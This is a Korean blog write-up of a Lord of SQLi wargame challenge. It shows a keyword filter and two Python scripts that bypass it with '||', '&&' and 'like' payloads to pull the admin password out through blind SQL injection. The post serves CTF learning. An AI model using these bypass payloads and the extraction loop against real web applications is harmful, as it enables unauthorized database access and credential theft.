11번문제의 php코드

 

1. 문제풀이

 

1) 코드 해석

  • 이번 문제는 blind SQLi문제로 저번에 사용하였던 자동화도구를 사용하여 풀면 된다
  • 하지만 이번 문제에서는 다음과 같이 여러가지 필터링이 있다

if(preg_match('/or|and|substr\(|=/i'$_GET[pw])) exit("HeHe"); 

  • or,and,substr,= 이렇게 SQLi에서 많이 쓰이는 문자 4가지 정도가 필터링이 걸려있다
  • 위 문자들을 우회해서 자동화 도구를 사용하면 비밀번호를 알아낼 수 있다

 

2) 문제 풀이

방법은 다음과 같다

  • 먼저 우회한 페이로드를 작성하여 자동화도구에 페이로드 코드부분을 수정한다
  • 그 다음 실제pw를 알아내서 공격을 시도한다

 

2-1 비밀번호의 길이를 알아내는 python코드

import requests
url = 'https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php' #url 주소를 입력
cookies = {'PHPSESSID': 'cookie'} #세션 쿠키를 입력
def find_pw_len():
    pw_len = 0
    while 1:
        pw_len=pw_len+1
        value = "' || id like 'admin' && length(pw) like {} #".format(pw_len) #반복하면서 pw의 글자수를 비교하는 Payload 코드 작성
        params = {"pw": value} # pw에 Payload 코드 삽입 
        response = requests.get(url,params=params, cookies=cookies) #GET을 통해 전달
        print(response.status_code) # 응답 코드 확인 200번아니면 오류 상태
        print(value) # 전달되는 Payload 코드 확인
        if "Hello admin" in response.text: 
            break
    return pw_len #pw 길이 반환
if __name__ == '__main__':
    print("pw의 길이는 : "+str(find_pw_len()))

 

2-2 실제 비밀번호를 알아내는 python코드

import requests
url = 'https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php' #url 주소를 입력
cookies = {'PHPSESSID': 'cookie'} #세션 쿠키를 입력
def find_pw_len():
    pw_len = 0
    while 1:
        pw_len=pw_len+1
        value = "' || id like 'admin' && length(pw) like {} #".format(pw_len) #반복하면서 pw의 글자수를 비교하는 Payload 코드 작성
        params = {'pw': value} # pw에 Payload 코드 삽입 
        response = requests.get(url,params=params, cookies=cookies) #GET을 통해 전달
        print(response.status_code) # 응답 코드 확인 200번아니면 오류 상태
        print(value) # 전달되는 Payload 코드 확인
        if "Hello admin" in response.text: 
            break
    return pw_len #id 길이 반환
def find_pw_str(pw_len):
    pw_str = ""
    for len in range(1,pw_len+1):
        for ascii in range(0,127): #ascii a~z까지의 값 반복
            value = "' || ascii(substring(pw,{},1)) like {} #".format(len,ascii)  # 반복하면서 pw를 substring 한다음 ascii로 변환한 값을 통해 비교해서 정답을 찾아냄
            params = {'pw': value}  # pw에 Payload 코드 삽입 
            response = requests.get(url, params=params, cookies=cookies)  # GET을 통해 전달
            print(response.status_code)  # 응답 코드 확인 200번아니면 오류 상태
            print(value)  # 전달되는 Payload 코드 확인
            if "Hello admin" in response.text:  
                pw_str+=chr(ascii)+":" #참이라면 ascii코드를 char형으로 변경해서 저장
        pw_str+="\n"
    return pw_str #한 문자에 대한 검색이 끝날시 엔터 처리
if __name__ == '__main__':
    print("비밀번호 조합 : \n"+find_pw_str(find_pw_len()))

 

비밀번호의 길이를 알아내는 공격화면
실제 비밀번호를 알아내는 공격화면
공격 성공화면

 

'Lord of SQLi | WebHacking.kr' 카테고리의 다른 글

WebHacking.kr(#25)  (0) 2023.04.13
Lord of SQLi(#12 darkknight)  (0) 2023.01.05
Lord of SQLi(#10 skeleton)  (0) 2023.01.04
Lord of SQLi(#9 vampire)  (0) 2023.01.04
Lord of SQLi(#8 troll)  (0) 2022.12.30

+ Recent posts

티스토리툴바